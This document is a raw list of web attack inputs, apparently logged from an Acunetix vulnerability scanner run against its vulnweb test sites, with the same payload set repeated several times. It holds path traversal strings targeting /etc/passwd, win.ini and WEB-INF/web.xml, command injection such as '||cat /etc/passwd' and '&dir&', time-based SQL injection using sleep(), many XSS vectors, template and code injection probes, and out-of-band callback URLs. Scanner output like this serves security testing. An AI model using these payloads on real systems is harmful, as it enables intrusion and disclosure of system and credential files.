http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

"

1

"

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1)

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitXh9xhCfaIZ.bxss.me/

&dir

1

-1))

1_3mE7E <ScRiPt >prompt(990573)</ScRiPt>

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

'&dir&'

1

ho5lst9k'

1

comments

1

1

http://www.acunetix.tst

QqiRh9n3')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

1

comments

TPu0QczG'))

file:///etc/passwd

1

1

1

1

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments/.

1'"()&%<ScRiPt >prompt(927039)</ScRiPt>

1

'"

1

'|dir

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(911945)</ScRiPt>

"|dir

1

1

<!--

1

WEB-INF\web.xml

1_918698

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu8902\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8902

1

../../../../../../../../../../boot.ini

1

1

1

1

acux8811\xc0\xbez1\xc0\xbcz2a\x90bcxuca8811

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(939159)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(919042)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(913980)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959645></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(939170)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(934385)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(935524)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(940725))>

response.write(9840023*9655018)

1

1

1

WEB-INF/web.xml

1<iframe src='data:text/html

&cat /etc/passwd&

'+response.write(9840023*9655018)+'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<body onload=prompt(984318)>

1

../../../../../../../../../../etc/passwd

"+response.write(9840023*9655018)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(912387)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(942197)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1

${100464+99255}

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(929018)>

-1

1

`cat /etc/passwd`

1

1

1

1&n977913=v906407

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(993991)</sCripT>

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

)

1

1

1some_inexistent_file_with_long_name%00.jpg

1&lt

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

khzyW08b'

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

\xf6<img acu onmouseover=prompt(968398) //\xf6>

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

cPWFPCC3')

^(#$!@#$)(()))******

testasp.vulnweb.com

'

1<input autofocus onfocus=prompt(972791)>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

UYYhBbm3'))

1

1

<a href='http://www.acunetix.com'>website security</a>

"

-1

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

-1)

1

${@print(md5(acunetix_wvs_security_test))}

1

"

http://hitnVrNxNDQDH.bxss.me/

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1_1hIhX <ScRiPt >prompt(932468)</ScRiPt>

-1))

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1dPpnhS8'

1

comments

1

&dir

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

EMM3rKJp')

comments

'"

'&dir&'

1

1

1

file:///etc/passwd

1

1

1

TRStOtCz'))

comments/.

<!--

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(944143)</ScRiPt>

1

1

1

|dir

1

1

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(983065)</ScRiPt>

1

1

'|dir

1

WEB-INF\web.xml

1_908486

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

acu4027\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4027

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux7126\xc0\xbez1\xc0\xbcz2a\x90bcxuca7126

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(982591)</ScRiPt>

1

................windowswin.ini

1

1

1

1<script>prompt(971487)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(974124)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?992466></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(950961)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9841432*9878428)

1<video><source onerror="javascript:prompt(965944)">

1

1

1

'+response.write(9841432*9878428)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936366)"></g></svg>

WEB-INF/web.xml

1

"+response.write(9841432*9878428)+"

1

1

1<div style=width:expression(prompt(913496))>

&cat /etc/passwd&

WEB-INF\web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(995039)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

-1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954045)>

1

${99610+100133}

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

-1)

1<img src=xyz OnErRor=prompt(974851)>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1&n960142=v983736

1<img/src=">" onerror=alert(906573)>

1

)

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

9rSpEbLv'

1<ScRiPt%20>prompt(975395)</sCripT>

1

!(()&&!|*|*|

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

I2QotUYh')

^(#$!@#$)(()))******

1&lt

1

1

testasp.vulnweb.com

"|"ld

qnzxJ6Cz'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(961974) //\xf6>

'"()

1

'

1

1

-1

1<input autofocus onfocus=prompt(955340)>

1

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

'

1

-1)

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

"

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1))

http://hittGNY0kseGk.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1_0cupQ <ScRiPt >prompt(991950)</ScRiPt>

Vum1wxpV'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

1

QXebaHpv')

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

'"

1

'&dir&'

1

A8AfYItT'))

comments

1

<!--

file:///etc/passwd

1

1

comments/.

1

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1'"()&%<ScRiPt >prompt(906779)</ScRiPt>

WEB-INF/web.xml

1

1

|dir

1

1

'"()&%<ScRiPt >prompt(922405)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

'|dir

1_929579

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu2907\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2907

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6637\xc0\xbez1\xc0\xbcz2a\x90bcxuca6637

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(936602)</ScRiPt>

1

1<script>prompt(950205)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(998714)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996397></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(925575)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(930598)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933745)"></g></svg>

1

1

response.write(9328926*9626067)

1

1<div style=width:expression(prompt(917124))>

1

1

'+response.write(9328926*9626067)+'

&cat /etc/passwd&

1<iframe src='data:text/html

1

1

1

WEB-INF/web.xml

"+response.write(9328926*9626067)+"

1<body onload=prompt(993915)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996704)>

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(965852)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1

1<img/src=">" onerror=alert(969497)>

1

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100346+99362}

1

-1)

1<ScRiPt%20>prompt(945150)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n965646=v955426

'|'ld

)

WJHDxJif'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

\xf6<img acu onmouseover=prompt(983697) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

!(()&&!|*|*|

testasp.vulnweb.com

J981s5W9')

1

'"()

1

1<input autofocus onfocus=prompt(900258)>

/etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Z5yislNp'))

1

1

<a href='http://www.acunetix.com'>website security</a>

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

-1

1

1

1

[url=http://www.acunetix.com]website security[/url]

"

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

1

http://hithanPo96LBu.bxss.me/

1

1_XodiA <ScRiPt >prompt(976027)</ScRiPt>

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1

1

1

1

&dir

comments

${@print(md5(acunetix_wvs_security_test))}\

vGrM0xku'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

http://www.acunetix.tst

'&dir&'

comments

file:///etc/passwd

1

1

yqMSpLdr')

1

comments/.

'"

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(948641)</ScRiPt>

aWsmlmAa'))

1

<!--

1

|dir

1

1

'"()&%<ScRiPt >prompt(931162)</ScRiPt>

1

WEB-INF/web.xml

1

1

'|dir

1_962076

1

1

WEB-INF\web.xml

1

1

1

"|dir

acu2005\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2005

1

../../../../../../../../../../windows/win.ini

1

1

acux3839\xc0\xbez1\xc0\xbcz2a\x90bcxuca3839

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(902550)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(933712)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(952727)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990952></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(901340)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(927226)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961164)"></g></svg>

1

1

1

1<div style=width:expression(prompt(998618))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(982200)>

response.write(9000478*9025825)

1

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909978)>

'+response.write(9000478*9025825)+'

1

1

1

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(967432)>

"+response.write(9000478*9025825)+"

1

&cat /etc/passwd&

1

1

1<img/src=">" onerror=alert(941944)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<ScRiPt%20>prompt(936384)</sCripT>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

SomeCustomInjectedHeader:injected_by_wvs

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

\xf6<img acu onmouseover=prompt(949476) //\xf6>

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

1

1<input autofocus onfocus=prompt(932961)>

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

${99819+100473}

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n913270=v932139

-1))

1

'|'ld

[url=http://www.acunetix.com]website security[/url]

)

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1_1IGfE <ScRiPt >prompt(942987)</ScRiPt>

GhWcfE4C'

"|"ld

!(()&&!|*|*|

/etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

h7uL0q1e')

^(#$!@#$)(()))******

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

testasp.vulnweb.com

KcuzKrBA'))

1

'

1

1

'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

"

1

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

http://hitdp10UoPKvW.bxss.me/

&dir

1

acunetix_wvs_invalid_filename

1

1

1

ACUdF0jb'

1

1

'&dir&'

1

comments

1

wVcqQpdD'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

"&dir&"

1

http://www.acunetix.tst

'"

comments

1

m8ZadxIK'

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

<!--

1'"()&%<ScRiPt >prompt(986698)</ScRiPt>

comments/.

1

DZzoT5Fl')

WEB-INF/web.xml

1

'|dir

1

1

'"()&%<ScRiPt >prompt(946989)</ScRiPt>

1

WEB-INF\web.xml

sJtaLYro'))

1

"|dir

1

1_947227

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu9426\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9426

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux1752\xc0\xbez1\xc0\xbcz2a\x90bcxuca1752

1

1

1

1<ScRiPt >prompt(971145)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(947267)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(961017)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977700></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(994842)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(956246)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(958358)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(927310))>

1

1

1<iframe src='data:text/html

1

response.write(9967265*9199656)

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(953625)>

'&cat /etc/passwd&'

WEB-INF/web.xml

'+response.write(9967265*9199656)+'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(978389)>

WEB-INF\web.xml

"&cat /etc/passwd&"

"+response.write(9967265*9199656)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<img src=xyz OnErRor=prompt(966391)>

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(999417)>

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(911096)</sCripT>

-1

${99866+100339}

1

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

-1)

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(913209) //\xf6>

)

1&n940552=v920834

-1))

1

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

1<input autofocus onfocus=prompt(994767)>

gaq5hYcR'

1

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

G2tkCREz')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

1

^(#$!@#$)(()))******

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

'

jpCJIMoe'))

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

"

-1

1

1_Oq9PO <ScRiPt >prompt(981601)</ScRiPt>

1

http://hitXVzbrb7Poh.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

-1)

1

1

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

&dir

1

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

H0gmoQzI'

1

'&dir&'

http://www.acunetix.tst

1

1

comments

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

C7VBEwm1')

"&dir&"

'"

1

comments/.

1'"()&%<ScRiPt >prompt(912257)</ScRiPt>

WEB-INF/web.xml

AmRZjkBC'))

1

<!--

|dir

1

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(946510)</ScRiPt>

1

1

'|dir

1

1

1_951040

1

../../../../../../../../../../windows/win.ini

1

1

"|dir

1

1

../../../../../../../../../../boot.ini

1

acu10303\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10303

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux9186\xc0\xbez1\xc0\xbcz2a\x90bcxuca9186

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(996795)</ScRiPt>

1

1

................windowswin.ini

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(926370)</script>

1

1

1

1

1<ScRiPt >prompt(985294)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995644></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(946657)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(936869)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901396)"></g></svg>

1

1

response.write(9645728*9291386)

1

1<div style=width:expression(prompt(990757))>

WEB-INF/web.xml

1

'+response.write(9645728*9291386)+'

1

&cat /etc/passwd&

1<iframe src='data:text/html

1

WEB-INF\web.xml

1

"+response.write(9645728*9291386)+"

1

1<body onload=prompt(936909)>

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9.138),0)/*'XOR(if(now()=sysdate(),sleep(9.138),0))OR'"XOR(if(now()=sysdate(),sleep(9.138),0))OR"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932046)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(9.138)))v)/*'+(select(0)from(select(sleep(9.138)))v)+'"+(select(0)from(select(sleep(9.138)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(953575)>

cat /etc/passwd

-1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(992512)>

`cat /etc/passwd`

-1)

1

1

1

${99833+100420}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(918628)</sCripT>

-1))

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1&n908579=v973784

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

p75QPQln'

)

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

1

